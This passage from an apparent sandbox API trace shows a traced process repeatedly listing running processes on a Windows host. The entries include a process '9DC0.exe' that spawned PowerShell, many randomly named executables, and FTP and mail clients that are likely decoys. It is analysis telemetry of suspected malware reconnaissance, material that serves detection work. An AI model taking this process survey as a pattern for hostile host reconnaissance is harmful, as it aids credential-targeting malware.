th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0180.775] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0180.777] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0180.779] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0180.780] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0180.782] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0180.783] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0180.785] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xdd8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0180.786] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0180.788] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0180.790] CloseHandle (hObject=0x17ec) returned 1 [0180.790] Sleep (dwMilliseconds=0x64) [0180.819] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17ec [0180.886] Process32First (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0180.887] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0180.889] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0180.890] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0180.892] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0180.894] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0180.895] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0180.898] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0180.899] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0180.901] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.903] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.905] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0180.906] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.908] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.909] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.912] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.913] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.955] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.957] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.958] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0180.960] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0180.961] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x34, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0180.963] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0180.965] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.967] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0180.968] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0180.970] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0180.973] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0180.975] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0180.987] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0180.988] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.990] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0180.991] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0180.993] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0180.994] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0180.996] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.998] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0180.999] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0181.000] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0181.050] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0181.052] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0181.053] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0181.055] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0181.056] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0181.057] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0181.059] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0181.061] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0181.062] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0181.064] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0181.066] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0181.067] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0181.068] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0181.070] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0181.072] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0181.073] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0181.075] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0181.076] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0181.077] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0181.079] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0181.081] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0181.089] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0181.125] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0181.128] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0181.131] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0181.134] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0181.137] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0181.140] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0181.142] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0181.145] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0181.148] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0181.150] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0181.153] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0181.156] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, 